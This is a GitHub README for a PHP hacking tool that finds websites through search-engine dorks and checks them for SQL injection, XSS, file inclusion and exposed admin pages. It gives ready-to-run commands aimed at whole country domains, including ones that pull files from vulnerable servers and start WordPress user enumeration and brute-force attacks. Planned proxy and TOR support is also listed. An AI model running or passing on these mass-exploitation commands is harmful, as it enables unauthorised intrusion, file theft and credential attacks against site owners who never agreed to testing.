/README.md

https://github.com/aszone/avenger-sh · Markdown · 135 lines · 101 code · 34 blank · 0 comment · 0 complexity · 5b394ac44eaaa9af58f0336545e9d67a MD5 · raw file 

    

  1. # PHP Avenger
    2. 

  2. 

  3. > PHP Avenger is a modern collection of open source tools written in PHP with focus in security and hacking.
    4. 

  4. 

  5. ### Beta
    6. 

  6. 

  7. * PHP Avenger sh ( Search Engine )
    8. 

  8. 

  9. ### Future Implementation
    10. 

  10. 

  11. 

  12. * PHP Avenger bt ( Brute - Force )
    13. 

  13. * PHP Avenger sca ( State Code Analyse )
    14. 

  14. * PHP Avenger pwp ( Plugin WordPress )
    15. 

  15. * PHP Avenger cj ( Component Joomla )
    16. 

  16. 

  17. ***
    18. 

  18. ### PHP Avenger SH
    19. 

  19. 

  20. > Php Avenger sh is a open source tool with an idea **based in a fork inurlbr by Cleiton Pinheiro**. Basically **PHP Avenger sh** is a tool that automates the process of detecting possible vulnerabilities using mass scan and checking if the vulnerability is true or false. Php Avenger uses search engines like google, bing and others through dorks ( advanced search ).
    21. 

  21. 

  22. ## Installation
    23. 

  23. 

  24. The recommended way to install PHP Avenger is through
    25. 

  25. [Composer](http://getcomposer.org).
    26. 

  26. 

  27. ```bash
    28. 

  28. # Install Composer
    29. 

  29. curl -sS https://getcomposer.org/installer | php
    30. 

  30. ```
    31. 

  31. 

  32. Next, run the Composer command to install the latest beta version of Php Avenger SH:
    33. 

  33. 

  34. ```bash
    35. 

  35. php composer.phar create-project aszone/avenger-sh
    36. 

  36. cd avenger-sh
    37. 

  37. ```
    38. 

  38. ## Basic Usage
    39. 

  39. 

  40. > Use the commands bellow to init the process, results will be printed in the monitor and saved in a `.txt` file on folder `results`.
    41. 

  41. 

  42. ### Get trash search
    43. 

  43. 

  44. ```bash
    45. 

  45. php avenger sh --dork="site:com.ar ext:sql password"
    46. 

  46. ```
    47. 

  47. #### Result of trash search
    48. 

  48. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem1.png)
    49. 

  49. 

  50. 

  51. ### Check Sql Injection
    52. 

  52. ```bash
    53. 

  53. php avenger sh --dork="site:com.ar inurl:php?id=" --check="sqli"
    54. 

  54. ```
    55. 

  55. #### Result of Sql Injection
    56. 

  56. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem2.png)
    57. 

  57. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem3.png)
    58. 

  58. 

  59. 

  60. ### Check Local File Download
    61. 

  61. ```bash
    62. 

  62. php avenger sh --dork="site:com.ar inurl:download.php?file=" --check="lfd"
    63. 

  63. ```
    64. 

  64. #### Result of Local File Download
    65. 

  65. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/06/imagem7.png)
    66. 

  66. 

  67. ### Check and Exploited Local File Download
    68. 

  68. 

  69. > This next command you will check vulnerabilities and extract files of server. The files will save in /results/exploits/lfd/
    70. 

  70. 

  71. ```bash
    72. 

  72. php avenger sh --dork="site:com.mx inurl:download.php?file=" --check="lfd" --exploit="lfd"
    73. 

  73. ```
    74. 

  74. #### Result of Extract Files
    75. 

  75. ![alt tag](http://lenonleite.com.br/wp-content/uploads/2016/11/lfdFiles.png)
    76. 

  76. #### Video of Extract Files
    77. 

  77. [![Video of extract files](https://img.youtube.com/vi/IdrpQ7KQlmU/0.jpg)](https://www.youtube.com/watch?v=IdrpQ7KQlmU)
    78. 

  78. 

  79. ### Check is Admin Page
    80. 

  80. ```bash
    81. 

  81. php avenger sh --dork="site:com.ar inurl:admin" --check="isAdmin"
    82. 

  82. ```
    83. 

  83. 

  84. ### Check is Admin Page and if Admin Page for WordPress get all users and start brute force
    85. 

  85. ```bash
    86. 

  86. php avenger sh --dork="site:com inurl:wp-content/uploads" --check="isAdmin" --exploit="btwp"
    87. 

  87. ```
    88. 

  88. 

  89. ### Help for commands
    90. 

  90. ```bash
    91. 

  91. php avenger sh
    92. 

  92. ```
    93. 

  93. 

  94. ## Details
    95. 

  95. 

  96. #### Search Engines
    97. 

  97. * Google
    98. 

  98. * GoogleApi
    99. 

  99. * Bing
    100. 

  100. * DuckDuckGo
    101. 

  101. * Yahoo
    102. 

  102. * Yandex
    103. 

  103. 

  104. #### Covered Vulnerabilities
    105. 

  105. * Sql Injection (SQLI)
    106. 

  106. * Local File Download (LFD)
    107. 

  107. * Admin Page
    108. 

  108. * Remote File Inclusion (RFI)
    109. 

  109. * Cross-Site-Scripting (XSS)
    110. 

  110. 

  111. #### Covered Exploits
    112. 

  112. * Local File Download (LFD)
    113. 

  113. * Brute Force for WordPress
    114. 

  114. 

  115. #### Covered Vulnerabilities in next versions
    116. 

  116. * Sensitive Files
    117. 

  117.     * Dump Files
    118. 

  118.     * Config Files
    119. 

  119.     * Open Folders
    120. 

  120. 

  121. #### Features under development
    122. 

  122. * Power Search
    123. 

  123. * Send E-mail with results
    124. 

  124. * Naming the `.txt` result file
    125. 

  125. * Proxys
    126. 

  126.     * TOR
    127. 

  127.     * Site of Proxys
    128. 

  128.     * **Virgin Proxies**
    129. 

  129. 

  130. ## Help and docs
    131. 

  131. * [Documentation](http://phpavenger.aszone.com.br).
    132. 

  132. * [Examples](http://phpavenger.aszone.com.br/examples).
    133. 

  133. * [Videos](https://www.youtube.com/user/MrLenonleite).
    134. 

  134. * [Steakoverflow](http://phpavenger.aszone.com.br).
    135.